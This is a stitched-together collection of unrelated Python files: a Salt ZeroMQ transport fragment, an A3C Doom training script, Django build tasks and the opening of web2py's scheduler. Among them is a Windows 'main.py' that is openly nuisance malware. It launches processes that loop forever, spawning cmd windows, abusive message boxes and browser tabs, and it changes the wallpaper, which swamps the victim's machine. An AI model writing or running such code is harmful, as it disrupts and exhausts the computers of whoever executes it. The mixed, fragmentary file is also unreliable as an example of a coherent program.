self.send_future_map.get(message, None) if future is None: # Timedout del self.send_queue[0] continue # send def mark_future(msg): if not future.done(): data = self.serial.loads(msg[0]) future.set_result(data) self.stream.on_recv(mark_future) self.stream.send(message) try: ret = yield future except Exception as err: # pylint: disable=W0702 log.debug('Re-init ZMQ socket: %s', err) self._init_socket() # re-init the zmq socket (no other way in zmq) del self.send_queue[0] continue del self.send_queue[0] self.send_future_map.pop(message, None) self.remove_message_timeout(message) def remove_message_timeout(self, message): if message not in self.send_timeout_map: return timeout = self.send_timeout_map.pop(message, None) if timeout is not None: # Hasn't been already timedout self.io_loop.remove_timeout(timeout) def timeout_message(self, message): ''' Handle a message timeout by removing it from the sending queue and informing the caller :raises: SaltReqTimeoutError ''' future = self.send_future_map.pop(message, None) # In a race condition the message might have been sent by the time # we're timing it out. Make sure the future is not None if future is not None: del self.send_timeout_map[message] if future.attempts < future.tries: future.attempts += 1 log.debug('SaltReqTimeoutError, retrying. 
(%s/%s)', future.attempts, future.tries) self.send( message, timeout=future.timeout, tries=future.tries, future=future, ) else: future.set_exception(SaltReqTimeoutError('Message timed out')) def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False): ''' Return a future which will be completed when the message has a response ''' if future is None: future = tornado.concurrent.Future() future.tries = tries future.attempts = 0 future.timeout = timeout # if a future wasn't passed in, we need to serialize the message message = self.serial.dumps(message) if callback is not None: def handle_future(future): response = future.result() self.io_loop.add_callback(callback, response) future.add_done_callback(handle_future) # Add this future to the mapping self.send_future_map[message] = future if self.opts.get('detect_mode') is True: timeout = 1 if timeout is not None: send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message) self.send_timeout_map[message] = send_timeout if len(self.send_queue) == 0: self.io_loop.spawn_callback(self._internal_send_recv) self.send_queue.append(message) return future class ZeroMQSocketMonitor(object): __EVENT_MAP = None def __init__(self, socket): ''' Create ZMQ monitor sockets More information: http://api.zeromq.org/4-0:zmq-socket-monitor ''' self._socket = socket self._monitor_socket = self._socket.get_monitor_socket() self._monitor_stream = None def start_io_loop(self, io_loop): log.trace("Event monitor start!") self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop) self._monitor_stream.on_recv(self.monitor_callback) def start_poll(self): log.trace("Event monitor start!") try: while self._monitor_socket is not None and self._monitor_socket.poll(): msg = self._monitor_socket.recv_multipart() self.monitor_callback(msg) except (AttributeError, zmq.error.ContextTerminated): # We cannot log here because we'll get an interrupted system call in trying # to flush 
the logging buffer as we terminate pass @property def event_map(self): if ZeroMQSocketMonitor.__EVENT_MAP is None: event_map = {} for name in dir(zmq): if name.startswith('EVENT_'): value = getattr(zmq, name) event_map[value] = name ZeroMQSocketMonitor.__EVENT_MAP = event_map return ZeroMQSocketMonitor.__EVENT_MAP def monitor_callback(self, msg): evt = zmq.utils.monitor.parse_monitor_message(msg) evt['description'] = self.event_map[evt['event']] log.debug("ZeroMQ event: %s", evt) if evt['event'] == zmq.EVENT_MONITOR_STOPPED: self.stop() def stop(self): if self._socket is None: return self._socket.disable_monitor() self._socket = None self._monitor_socket = None if self._monitor_stream is not None: self._monitor_stream.close() self._monitor_stream = None log.trace("Event monitor done!")
# ---- concatenated file boundary: a3c-standard.py ----
# A3C (Asynchronous Advantage Actor-Critic) training script: one global
# network plus `num_workers` worker threads, each with a local copy of the
# network and its own simulator environment.
import tensorflow as tf
from time import sleep
import threading
import numpy as np
from tensorflow.contrib import slim
import time
import scipy.signal
import cv2
#import gym
import csv
from scipy.ndimage.filters import gaussian_filter1d
from simulator import simulator

# --- hyperparameters / run configuration ---
num_workers = 6
environment = 'Doom_Basic'
set_learning_rate = 1e-4
no_of_actions = 3
clip_using_norm = True          # True: clip gradients by global norm; False: clip by value
clip_norm_magnitude = 40.0
clip_value_magnitude = 0.001
lives = 5
logfilename = 'scores_'+str(environment)+'_w'+str(num_workers)+'_standard.csv'


def process_frame(x):
    """Resize a raw frame to 84x84 and flatten it to a 1-D vector."""
    #image preprocessing following http://karpathy.github.io/2016/05/31/rl/
    #s = frame[10:-10,30:-30]
    s = cv2.resize(x,(84,84))
    #s = np.reshape(s,[np.prod(s.shape)]) / 255.0
    return s.reshape(-1)


class experience():
    #experience buffer for storing trajectories and rewards
    def __init__(self,cfg):
        self.episode_buffer = []
    def add_experience(self,x):
        # x is a [state, action, reward, next_state, done, value] record
        self.episode_buffer.append(x)
    def reset(self):
        self.episode_buffer = []


class cfg():
    #cfg class for hyperparameters
    def __init__(self):
        self.gamma = 0.99 #discount rate
        self.s_size = 7056*2 #input to network(flattened image vector)
        self.a_size = no_of_actions #number of actions (Pong-specific)

cfg = cfg() #initialize cfg class
a_size = cfg.a_size


#normalized_columns_initializer lifted from https://medium.com/emergent-future/simple-reinforcement-learning-with-tensorflow-part-8-asynchronous-actor-critic-agents-a3c-c88f72a5e9f2
def normalized_columns_initializer(std=1.0):
    """Return an initializer whose columns are normalized to `std`, clamped to [-1, 1]."""
    def _initializer(shape, dtype=None, partition_info=None):
        out = np.random.randn(*shape).astype(np.float32)
        out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
        out[out > 1.0] = 1.0; out[out < -1.0] = -1.0
        return tf.constant(out)
    return _initializer


def modify_gradients(x):
    """Zero out NaN/inf gradients, then clip (by global norm or by value)."""
    x = [tf.where(tf.is_nan(grad),tf.zeros_like(grad),grad) for grad in x]
    x = [tf.where(tf.equal(grad,np.inf),tf.zeros_like(grad),grad) for grad in x]
    x = [tf.where(tf.equal(grad,-np.inf),tf.zeros_like(grad),grad) for grad in x]
    if clip_using_norm == True:
        x,_ = tf.clip_by_global_norm(x,clip_norm_magnitude) #clipping operation using global norm
    else:
        x = [tf.clip_by_value(grad,-clip_value_magnitude,+clip_value_magnitude) for grad in x] #alternative clipping operation using clip by value
    return x


def create_network(inputs):
    """Build the conv + FC trunk and return (policy, value) heads."""
    net = tf.reshape(inputs,[-1,84,84,1])
    net = slim.conv2d( \
        inputs=net,num_outputs=32,kernel_size=[8,8],stride=[4,4],padding='VALID',biases_initializer=None,activation_fn=tf.nn.relu)
    net = slim.conv2d( \
        inputs=net,num_outputs=64,kernel_size=[4,4],stride=[2,2],padding='VALID',biases_initializer=None,activation_fn=tf.nn.relu)
    net = slim.conv2d( \
        inputs=net,num_outputs=64,kernel_size=[3,3],stride=[1,1],padding='VALID',biases_initializer=None,activation_fn=tf.nn.relu)
    fc_h = slim.fully_connected(slim.flatten(net),256,activation_fn=tf.nn.relu)
    policy = slim.fully_connected(fc_h,a_size,
        activation_fn=tf.nn.softmax,
        weights_initializer=normalized_columns_initializer(0.01),
        biases_initializer=None)
    value = slim.fully_connected(fc_h,1,
        activation_fn=None,
        weights_initializer=normalized_columns_initializer(0.01),
        biases_initializer=None)
    return policy, value


class AC_Network():
    """Actor-critic graph; non-'global' scopes also get loss + gradient ops."""
    def __init__(self,s_size,a_size,scope,trainer):
        # NOTE(review): s_size/2 is float division on py3; presumably the
        # input is a single 84*84 frame (half of cfg.s_size) — confirm.
        s_size = s_size/2
        with tf.variable_scope(scope):
            self.inputs = tf.placeholder(tf.float32,[None,s_size])
            self.policy, self.value = create_network(self.inputs)
            if scope != 'global':
                self.actions = tf.placeholder(shape=[None],dtype=tf.int32)
                self.actions_onehot = tf.one_hot(self.actions,a_size,dtype=tf.float32)
                self.target_v = tf.placeholder(shape=[None],dtype=tf.float32)
                self.advantages = tf.placeholder(shape=[None],dtype=tf.float32)
                # probability of the action actually taken
                self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
                self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value,[-1])))
                self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
                self.policy_loss = -0.5 * tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages)
                self.loss = self.value_loss + self.policy_loss - self.entropy * 0.01
                local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
                global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
                # gradients computed on local vars, applied to the global net
                self.gradients = tf.gradients(self.loss,local_vars)
                self.gradients = modify_gradients(self.gradients)
                #self.gradients,_ = tf.clip_by_global_norm(self.gradients,40.0)
                self.apply_grads = trainer.apply_gradients(zip(self.gradients,global_vars))


def update_target_graph(from_scope,to_scope):
    """Return ops that copy trainable variables from one scope to another."""
    from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
    to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
    op_holder = []
    for from_var,to_var in zip(from_vars,to_vars):
        op_holder.append(to_var.assign(from_var))
    return op_holder


def discount(x, gamma):
    # discounted cumulative sum via an IIR filter (unused variant of discountx)
    return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]


def discountx(r,gamma):
    """ take 1D float array of rewards and compute discounted reward """
    discounted_r = np.zeros_like(r)
    running_add = 0
    for t in reversed(range(0, r.size)):
        #if r[t] != 0.0: running_add = 0 # reset the sum, since this was a game boundary (pong specific!)
        running_add = running_add * gamma + r[t]
        discounted_r[t] = running_add
    return discounted_r


global_max = np.zeros(num_workers)


class Worker():
    """One A3C worker: owns a local network, an env, and an experience buffer."""
    def __init__(self,name,trainer,cfg):
        self.name = "worker_" + str(name)
        self.number = name
        self.trainer = trainer
        self.cfg = cfg
        self.local_AC = AC_Network(self.cfg.s_size,self.cfg.a_size,self.name,trainer)
        # op list that copies the global weights into this worker's scope
        self.update_local_ops = update_target_graph('global',self.name)
        self.env = simulator(a_size)
        self.experience = experience(self.cfg)

    def train(self,rollout,sess,gamma,bootstrap_value):
        """Compute targets/advantages for a rollout and apply grads to the global net."""
        rollout = np.array(rollout)
        observations = rollout[:,0]
        actions = rollout[:,1]
        rewards = rollout[:,2]
        next_observations = rollout[:,3]
        values = rollout[:,5]

        #t0 = time.time()
        # bootstrap the tail of the return with the critic's value estimate
        self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
        discounted_rewards = discountx(self.rewards_plus,0.99)
        self.value_plus = np.asarray(values.tolist() + [bootstrap_value])
        advantages = rewards + 0.99*discounted_rewards[1:] - self.value_plus[:-1]
        feed_dict = {self.local_AC.target_v:discounted_rewards[:-1],
            self.local_AC.inputs:np.vstack(observations),
            self.local_AC.actions:actions,
            self.local_AC.advantages:advantages}
        v_l,_ = sess.run([self.local_AC.value_loss,
            self.local_AC.apply_grads],
            feed_dict=feed_dict)
        sess.run(self.update_local_ops)
        #print (time.time() - t0)
        return v_l / len(rollout)

    def work(self,sess,coord,saver):
        """Main worker loop: act, collect experience, train every 32 steps."""
        total_steps = 0
        print ("Starting worker " + str(self.number))
        stats = 0.0
        losers = 0.0
        steps = 0.0
        global lives
        with sess.as_default(), sess.graph.as_default():
            while not coord.should_stop():
                sess.run(self.update_local_ops)
                episode_step_count = 0
                d = False
                self.experience.reset()
                self.env.initialize()
                s = self.env.fetch()
                s = process_frame(s)
                while d == False:
                    a_dist,v = sess.run([self.local_AC.policy,self.local_AC.value],
                        feed_dict={self.local_AC.inputs:[s]})
                    a_dist = a_dist.reshape(-1)
                    # sample an action from the policy distribution
                    a = np.random.choice(a_dist,p=a_dist)
                    a = np.argmax(a_dist == a)
                    r,d = self.env.move(a)
                    r = r/100.0
                    if r == 1.0:
                        stats += 1.0
                    if d == False:
                        s1 = self.env.fetch()
                        show = s1
                        s1 = process_frame(s1)
                    else:
                        steps += 1.0
                        s1 = s
                    self.experience.add_experience([s,a,r,s1,d,v[0,0]]) #add to experience buffer
                    # worker 0 handles periodic progress reporting / CSV logging
                    if self.number == 0:
                        #cv2.imshow("",show)
                        #cv2.waitKey(1)
                        if total_steps % 10000 == 0:
                            print(total_steps)
                        if total_steps % int(50000/8) == 0:
                            print("")
                            print("wins     : " + str(stats*8.0))
                            print("loss     : " + str(losers*8.0))
                            print("steps    : " + str(steps*8.0))
                            print("kill stat: " + str(stats/((steps)+1.0)))
                            print("")
                            with open(logfilename,'a') as f:
                                writer = csv.writer(f)
                                writer.writerow([stats,losers,steps,total_steps])
                            steps = 0
                            stats = 0.0
                            losers = 0.0
                    s = s1
                    episode_step_count += 1
                    total_steps += 1
                    # every 32 steps mid-episode, train with a bootstrapped value
                    if len(self.experience.episode_buffer) == 32 and d != True:
                        bootstrap_value = sess.run([self.local_AC.value],
                            feed_dict={self.local_AC.inputs:[s1]}) #get bootstrap
                        self.train(self.experience.episode_buffer,sess,self.cfg.gamma,bootstrap_value[0]) #call train procedure
                        self.experience.reset()
                    if d == True:
                        break
                # episode ended: train on the remainder with zero bootstrap
                if len(self.experience.episode_buffer) != 0:
                    self.train(self.experience.episode_buffer,sess,self.cfg.gamma,0.0) #call train procedure
                    self.experience.reset()


if __name__ == "__main__":
    tf.reset_default_graph()
    trainer = tf.train.AdamOptimizer(learning_rate=set_learning_rate)
    #trainer = tf.train.MomentumOptimizer(learning_rate=1e-3,momentum=0.9,use_nesterov=False)
    #trainer = tf.train.GradientDescentOptimizer(learning_rate=1e-6)
    master_network = AC_Network(cfg.s_size,cfg.a_size,'global',None)
    workers = []
    config = tf.ConfigProto()
    config.gpu_options.allow_growth=True
    for i in range(num_workers):
        workers.append(Worker(i,trainer,cfg))
    saver = tf.train.Saver(max_to_keep=5)
    with tf.Session(config=config) as sess:
        coord = tf.train.Coordinator()
        sess.run(tf.global_variables_initializer())
        worker_threads = []
        # stagger thread start-up slightly to avoid contention
        for worker in workers:
            worker_work = lambda: worker.work(sess,coord,saver)
            t = threading.Thread(target=(worker_work))
            t.start()
            sleep(0.5)
            worker_threads.append(t)
        coord.join(worker_threads)
# ---- concatenated file boundary: tasks.py ----
# Build/dev task definitions registered on a shared Tasks executor.
# Each @tasks.register(...) call lists the task names this task depends on.
import functools
import os
import sys
import threading

import pkg_resources

from .executor import Context, Tasks, TaskError
from .paths import in_dir, paths_for_shell

tasks = Tasks()


@tasks.register('dependencies', 'additional_assets', 'bundles', 'collect_static_files',
                'take_screenshots', 'compile_messages', 'precompile_python_code', default=True)
def build(_: Context):
    """
    Builds all necessary assets
    """
    # Aggregate task: all work happens in the dependency tasks listed above.


@tasks.register('build')
def start(context: Context, port=8000):
    """
    Starts a development server
    """
    # NB: if called in the same interpreter, cannot use auto-reloading else all tasks re-run
    # context.management_command('runserver', addrport=f'0:{port}', use_reloader=False)
    return context.shell(sys.executable, 'manage.py', 'runserver', f'0:{port}')


@tasks.register('build')
def serve(context: Context, port=8000, browsersync_port=3000, browsersync_ui_port=3030):
    """
    Starts a development server with auto-building and live-reload
    """
    from watchdog.events import PatternMatchingEventHandler
    from watchdog.observers import Observer

    class RebuildHandler(PatternMatchingEventHandler):
        # Debounces filesystem events: collects js/scss changes for 3 seconds,
        # then rebuilds only the affected bundle kind and reloads browsers.
        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            self._patterns = ['*.js', '*.scss', '*.html']
            self._ignore_directories = True
            self.builder = None
            self.rebuild_javascript = threading.Event()
            self.rebuild_stylesheets = threading.Event()

        def on_any_event(self, event):
            # restart the debounce timer on every event
            if self.builder:
                self.builder.cancel()
            extension = event.src_path.rsplit('.', 1)[-1].lower()
            if extension == 'js':
                self.rebuild_javascript.set()
            elif extension == 'scss':
                self.rebuild_stylesheets.set()
            self.builder = threading.Timer(3, self.rebuild)
            self.builder.start()

        def rebuild(self):
            if self.rebuild_javascript.is_set():
                self.rebuild_javascript.clear()
                context.debug('Triggering javascript build')
                bundle_javascript(context)
            if self.rebuild_stylesheets.is_set():
                self.rebuild_stylesheets.clear()
                context.debug('Triggering stylesheet build')
                bundle_stylesheets(context)
            context.debug('Reloading browsers')
            context.node_tool('browser-sync', 'reload', f'--port={browsersync_port}')

    context.info('Watching sources')
    observer = Observer()
    paths = [
        context.app.common_asset_source_path, context.app.asset_source_path,
        context.app.common_templates_path, context.app.templates_path,
    ]
    handler = RebuildHandler()
    for path in paths:
        observer.schedule(handler, path, recursive=True)
    observer.setDaemon(True)
    observer.start()

    context.info('Starting browser sync')
    browsersync_args = ['start', '--host=localhost', '--no-open',
                        '--logLevel', {0: 'silent', 1: 'info', 2: 'debug'}[context.verbosity],
                        f'--port={browsersync_port}', f'--proxy=localhost:{port}',
                        f'--ui-port={browsersync_ui_port}']
    browsersync = functools.partial(context.node_tool, 'browser-sync', *browsersync_args)
    threading.Thread(target=browsersync, daemon=True).start()

    context.info('Starting web server')
    return start(context, port=port)


@tasks.register('build', 'lint')
def test(context: Context, test_labels=None, functional_tests=False, accessibility_tests=False, webdriver=None):
    """
    Tests the app
    """
    # Test-mode flags are passed to the Django test runner via env vars
    if accessibility_tests:
        functional_tests = True
        os.environ['RUN_ACCESSIBILITY_TESTS'] = '1'
    if functional_tests:
        os.environ['RUN_FUNCTIONAL_TESTS'] = '1'
    if webdriver:
        os.environ['WEBDRIVER'] = webdriver
    test_labels = (test_labels or '').split()
    return context.management_command('test', *test_labels, interactive=False)


@tasks.register(hidden=True)
def create_build_paths(context: Context):
    """
    Creates directories needed for build outputs
    """
    paths = [
        context.app.asset_build_path, context.app.scss_build_path,
        context.app.screenshots_build_path, context.app.collected_assets_path,
    ]
    for path in filter(None, paths):
        os.makedirs(path, exist_ok=True)


@tasks.register(hidden=True)
def python_dependencies(context: Context, common_path=None):
    """
    Updates python dependencies
    """
    context.pip_command('install', '-r', context.requirements_file)
    if common_path:
        # Replace the published common package with a local editable checkout
        context.pip_command('uninstall', '--yes', 'money-to-prisoners-common')
        context.pip_command('install', '--force-reinstall', '-e', common_path)
        context.shell('rm', '-rf', 'webpack.config.js')  # because it refers to path to common


@tasks.register(hidden=True)
def package_json(context: Context):
    """
    Generates a package.json file
    """
    context.write_template('package.json')


@tasks.register('package_json', hidden=True)
def node_dependencies(context: Context):
    """
    Updates node.js dependencies
    """
    args = ['--loglevel', {0: 'silent', 1: 'warn', 2: 'info'}[context.verbosity]]
    if not context.use_colour:
        args.append('--color false')
    args.append('install')
    return context.shell('npm', *args)


@tasks.register('python_dependencies', 'node_dependencies', hidden=True)
def dependencies(_: Context):
    """
    Updates all dependencies
    """
    # Aggregate task: all work happens in the dependency tasks listed above.


@tasks.register(hidden=True)
def docker_compose_config(context: Context, port=8000):
    """
    Generates a docker-compose.yml file
    """
    context.write_template('docker-compose.yml', context={
        'port': port,
    })


@tasks.register('docker_compose_config', hidden=True)
def local_docker(context: Context):
    """
    Runs the app in a docker container; for local development only!
    Once performed, `docker-compose up` can be used directly
    """
    args = ()
    if context.verbosity > 1:
        args += ('--verbose',)
    args += ('up', '--build', '--remove-orphans')
    if not context.use_colour:
        args += ('--no-color',)
    context.shell('docker-compose', *args)


@tasks.register(hidden=True)
def webpack_config(context: Context):
    """
    Generates a webpack.config.js file
    """
    context.write_template('webpack.config.js')


@tasks.register('create_build_paths', 'node_dependencies', 'webpack_config', hidden=True)
def bundle_javascript(context: Context, production_bundle=False):
    """
    Compiles javascript
    """
    args = ['--bail']
    if not context.use_colour:
        args.append('--no-color')
    if production_bundle:
        args.append('--mode=production')
    return context.node_tool('webpack', *args)


@tasks.register('create_build_paths', 'node_dependencies', hidden=True)
def bundle_stylesheets(context: Context, production_bundle=False):
    """
    Compiles stylesheets
    """
    def make_output_file(css_path):
        css_name = os.path.basename(css_path)
        base_name = os.path.splitext(css_name)[0]
        return os.path.join(context.app.scss_build_path, f'{base_name}.css')

    style = 'compressed' if production_bundle else 'nested'
    args = [
        'pysassc',  # pysassc entrypoint always removes the first item
        f'--output-style={style}',
    ]
    for path in context.app.scss_include_paths:
        args.append(f'--include-path={path}')
    return_code = 0
    # call pysassc in-process (one invocation per source file); keep the
    # first non-zero return code but continue building the rest
    pysassc = pkg_resources.load_entry_point('libsass', 'console_scripts', 'pysassc')
    for source_file in context.app.scss_source_file_set.paths_for_shell(separator=None):
        context.info(f'Building {source_file}')
        pysassc_args = [*args + [source_file, make_output_file(source_file)]]
        return_code = pysassc(pysassc_args) or return_code
    return return_code


@tasks.register('bundle_javascript', 'bundle_stylesheets', hidden=True)
def bundles(_: Context):
    """
    Compiles assets
    """
    # Aggregate task: all work happens in the dependency tasks listed above.


@tasks.register(hidden=True)
def lint_config(context: Context):
    """
    Generates javasript and stylesheet linting configuration files
    """
    context.write_template('eslintrc.json', path='.eslintrc.json')
    context.write_template('sass-lint.yml', path='.sass-lint.yml')


@tasks.register('node_dependencies', 'lint_config', hidden=True)
def lint_javascript(context: Context):
    """
    Tests javascript for code and style errors
    """
    args = ['--format', 'stylish']
    if context.verbosity == 0:
        args.append('--quiet')
    if not context.use_colour:
        args.append('--no-color')
    args.append(context.app.javascript_source_path)
    return context.node_tool('eslint', *args)


@tasks.register('node_dependencies', 'lint_config', hidden=True)
def lint_stylesheets(context: Context):
    """
    Tests stylesheets for code and style errors
    """
    args = ['--format', 'stylish', '--syntax', 'scss']
    if context.verbosity > 1:
        args.append('--verbose')
    args.append(os.path.join(context.app.scss_source_path, '**', '*.scss'))
    return context.node_tool('sass-lint', *args)


@tasks.register('lint_javascript', 'lint_stylesheets', hidden=True)
def lint(_: Context):
    """
    Tests javascript and stylesheets for code and style errors
    """
    # Aggregate task: all work happens in the dependency tasks listed above.


@tasks.register('create_build_paths', hidden=True)
def additional_assets(context: Context):
    """
    Collects assets from GOV.UK frontend toolkit
    """
    rsync_flags = '-avz' if context.verbosity == 2 else '-az'
    for path in context.app.additional_asset_paths:
        context.shell(f'rsync {rsync_flags} {path}/ {context.app.asset_build_path}/')


@tasks.register('create_build_paths', hidden=True)
def take_screenshots(context: Context):
    """
    Takes screenshots if special test cases are defined
    """
    context.management_command('takescreenshots', interactive=False)
    collect_static_files(context)


@tasks.register('create_build_paths', hidden=True)
def collect_static_files(context: Context):
    """
    Collects assets for serving from single root
    """
    context.management_command('collectstatic', interactive=False)


@tasks.register(hidden=True)
def precompile_python_code(context: Context):
    """
    Pre-compiles python modules
    """
    from compileall import compile_dir

    kwargs = {}
    if context.verbosity < 2:
        kwargs['quiet'] = True
    compile_dir(context.app.django_app_name, **kwargs)


@tasks.register('python_dependencies')
def make_messages(context: Context, javascript=False, fuzzy=False):
    """
    Collects text into translation source files
    """
    kwargs = {
        'all': True,
        'keep_pot': True,
        'no_wrap': True,
    }
    if fuzzy:
        kwargs['allow_fuzzy'] = True
    if javascript:
        # app.js is generated, so exclude it from js message extraction
        kwargs.update(domain='djangojs', ignore_patterns=['app.js'])
    with in_dir(context.app.django_app_name):
        return context.management_command('makemessages', **kwargs)


@tasks.register('python_dependencies', hidden=True)
def compile_messages(context: Context):
    """
    Compiles translation messages
    """
    with in_dir(context.app.django_app_name):
        return context.management_command('compilemessages')


@tasks.register('python_dependencies')
def translations(context: Context, pull=False, push=False):
    """
    Synchronises translations with transifex.com
    """
    if not (pull or push):
        raise TaskError('Specify whether to push or pull translations')
    if pull:
        context.shell('tx', 'pull')
        make_messages(context, javascript=False)
        make_messages(context, javascript=True)
    if push:
        context.shell('tx', 'push', '--source', '--no-interactive')


@tasks.register()
def clean(context: Context, delete_dependencies: bool = False):
    """
    Deletes build outputs
    """
    paths = [
        context.app.asset_build_path, context.app.collected_assets_path,
        'docker-compose.yml', 'package.json', 'package-lock.json', 'webpack.config.js',
    ]
    context.shell(f'rm -rf {paths_for_shell(paths)}')
    context.shell(f'find {context.app.django_app_name} -name "*.pyc" -or -name __pycache__ -delete')
    if delete_dependencies:
        context.info(f'Cleaning app {context.app.name} dependencies')
        paths = ['node_modules', 'venv']
        context.shell(f'rm -rf {paths_for_shell(paths)}')
main.py
"""Importing modules""" import ctypes import os import webbrowser import random from time import sleep import threading from multiprocessing import Process # <----------> if os.name != 'nt': exit("Not windows") # <----------> LOGIN_MSG = r""" ______ ______ ______ ______ __ __ ______ __ __ ______ _____ /\ ___\ /\ ___\ /\__ _\ /\ ___\ /\ \/\ \ /\ ___\ /\ \/ / /\ ___\ /\ __-. \ \ \__ \ \ \ __\ \/_/\ \/ \ \ __\ \ \ \_\ \ \ \ \____ \ \ _"-. \ \ __\ \ \ \/\ \ \ \_____\ \ \_____\ \ \_\ \ \_\ \ \_____\ \ \_____\ \ \_\ \_\ \ \_____\ \ \____- \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/ \/_/\/_/ \/_____/ \/____/ """ # http://patorjk.com/software/taag/#p=display&f=Sub-Zero&t=GET%20FUCKED def login(): """Print login msg""" print(LOGIN_MSG) # <----------> #def hide(): # USE PYINSTALLER "--window" OPTION (https://bit.ly/3C6myWa) # """Hide cmd window""" # thisprogramm = win32gui.GetForegroundWindow() # win32gui.ShowWindow(thisprogramm, win32con.SW_HIDE) # <----------> def spam_msgbox(): """Spam user with windows""" while True: ctypes.windll.user32.MessageBoxW(0, "GET FUCKED", "LMAO", 16) def spam_cmd(): """Spam user with cmd""" while True: os.system("start") def change_wallpaper(): ctypes.windll.user32.SystemParametersInfoA(20, 0, "img/logo.png", 0) def spam_tabs(): """Spam user with tabs""" urls = ["https://www.youtube.com/watch?v=dQw4w9WgXcQ", "https://www.youtube.com/watch?v=d1YBv2mWll0"] while True: sleep(0.1) webbrowser.open_new_tab(random.choice(urls)) # <----------> # x1 = threading.Thread(target=spam_tabs, args=(1,)) # x2 = threading.Thread(target=spam_cmd, args=(1,)) # x3 = threading.Thread(target=spam_msgbox, args=(1,)) # x4 = threading.Thread(target=change_wallpaper, args=(1,)) proc1 = Process(target=spam_tabs) proc1.start() proc2 = Process(target=spam_cmd) proc2.start() proc3 = Process(target=spam_msgbox) proc3.start() proc4 = Process(target=change_wallpaper) proc4.start() # <----------> print(LOGIN_MSG)
scheduler.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim: set ts=4 sw=4 et ai: """ | This file is part of the web2py Web Framework | Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu> | License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) Background processes made simple --------------------------------- """ from __future__ import print_function import socket import os import logging import types from functools import reduce import datetime import re import sys from json import loads, dumps import tempfile import traceback import threading import multiprocessing import time import signal from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_EMPTY_OR from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB from gluon.utils import web2py_uuid from gluon._compat import Queue, long, iteritems, PY2, to_bytes, string_types, integer_types from gluon.storage import Storage USAGE = """ ## Example For any existing application myapp Create File: myapp/models/scheduler.py ====== from gluon.scheduler import Scheduler def demo1(*args, **vars): print('you passed args=%s and vars=%s' % (args, vars)) return 'done!' 
def demo2(): 1/0 scheduler = Scheduler(db, dict(demo1=demo1, demo2=demo2)) ## run worker nodes with: cd web2py python web2py.py -K myapp or python gluon/scheduler.py -u sqlite://storage.sqlite \ -f applications/myapp/databases/ \ -t mytasks.py (-h for info) python scheduler.py -h ## schedule jobs using http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task ## monitor scheduled jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id ## view completed jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id ## view workers http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id """ IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid()) logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER) QUEUED = 'QUEUED' ASSIGNED = 'ASSIGNED' RUNNING = 'RUNNING' COMPLETED = 'COMPLETED' FAILED = 'FAILED' TIMEOUT = 'TIMEOUT' STOPPED = 'STOPPED' ACTIVE = 'ACTIVE' TERMINATE = 'TERMINATE' DISABLED = 'DISABLED' KILL = 'KILL' PICK = 'PICK' STOP_TASK = 'STOP_TASK' EXPIRED = 'EXPIRED' SECONDS = 1 HEARTBEAT = 3 * SECONDS MAXHIBERNATION = 10 CLEAROUT = '!clear!' 
# Marker prefix: a task result longer than 1KB is spilled to a temp file and
# the stored result becomes RESULTINFILE + path (see executor / Scheduler.execute).
RESULTINFILE = 'result_in_file:'

# Every type accepted as a schedulable task function.
CALLABLETYPES = (types.LambdaType, types.FunctionType,
                 types.BuiltinFunctionType, types.MethodType,
                 types.BuiltinMethodType)


class Task(object):
    """Defines a "task" object that gets passed from the main thread to the
    executor's one
    """
    def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs):
        logger.debug(' new task allocated: %s.%s', app, function)
        self.app = app
        self.function = function
        self.timeout = timeout
        self.args = args  # json
        self.vars = vars  # json
        # Extra attributes (task_id, run_id, uuid, ...) are attached verbatim.
        self.__dict__.update(kwargs)

    def __str__(self):
        return '<Task: %s>' % self.function


class TaskReport(object):
    """Defines a "task report" object that gets passed from the executor's
    thread to the main one
    """
    def __init__(self, status, result=None, output=None, tb=None):
        logger.debug(' new task report: %s', status)
        if tb:
            logger.debug(' traceback: %s', tb)
        else:
            logger.debug(' result: %s', result)
        self.status = status
        self.result = result
        self.output = output
        self.tb = tb  # formatted traceback string when the task failed

    def __str__(self):
        return '<TaskReport: %s>' % self.status


class JobGraph(object):
    """Experimental: dependencies among tasks."""
    def __init__(self, db, job_name):
        self.job_name = job_name or 'job_0'
        self.db = db

    def add_deps(self, task_parent, task_child):
        """Create a dependency between task_parent and task_child."""
        self.db.scheduler_task_deps.insert(task_parent=task_parent,
                                           task_child=task_child,
                                           job_name=self.job_name)

    def validate(self, job_name=None):
        """Validate if all tasks job_name can be completed.

        Checks if there are no mutual dependencies among tasks
        (topological sort; returns the list of "levels" that can run in
        order, or None on a cycle).
        Commits at the end if successful, or it rollbacks the entire
        transaction. Handle with care!
        """
        db = self.db
        sd = db.scheduler_task_deps
        if job_name:
            q = sd.job_name == job_name
        else:
            q = sd.id  # no job_name: validate every stored dependency edge
        edges = db(q).select()
